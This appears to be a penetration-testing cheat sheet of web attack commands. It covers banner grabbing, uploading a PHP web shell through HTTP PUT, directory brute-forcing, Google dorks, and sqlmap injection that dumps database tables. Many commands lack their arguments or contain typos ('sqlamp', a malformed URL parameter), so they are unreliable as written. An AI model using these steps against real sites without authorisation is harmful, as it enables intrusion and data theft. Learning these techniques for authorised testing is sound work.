# Web Attacks ### Banner grabbing ``` nc -v HEAD / HTTP/1.0 ``` ### HTTPS services ``` openssl s_client -connect : HEAD / HTTP/1.0 ``` ### Fingerpriting with Httprint ``` httprint -P0 -h -s ``` ### HTTP Verbs ``` GET, POST, HEAD, PUT, DELETE, OPTIONS ``` ### Using PUT to upload shell ``` # Get the content length of the shell wc -m shell.php # Then using nc to upload with the PUT method nc PUT /payload.php HTTP/1.0 Content-type: text/html Content-length: ``` ### Directory and File Enumeration Enumeration of files and directories can lead to many hidden resources that could contain: * New and untested features * Backup files * Testing information * Developer's notes ``` # Dirb is a great tool to use for directory/file brute forcing dirb http:// # Gobuster is another directory/file scanner written in Go gobuster -u -w -o ``` ### Google Dorks | Command | Meaning | | ----------- | ------------------------------------------------------------------------------------------------------------ | | site: | You can use this command to include only results on a given hostname. | | intitle: | This command filters according to the title of a page. | | inurl: | Similar to intitle, but works on the URL of a resource. | | filetype: | This filters by using the file extension of a resource. For example .pdf or .xls. | | AND, OR, &, | You can use logical operators to combine your expressions. For example: site:example.com OR site:another.com | | - | You can use this character to filter out a keyword or a command's result from the query. | ### SQL Injection with SQLMap ``` sqlmap -u -p [options] # Example sqlmap -u 'http://vicitim.site/search.php?id=2' -p id --technique=U # Dump contents of a specific table in a database sqlamp -u 'http://victim.site/search.php?=1' -D -T --dump ```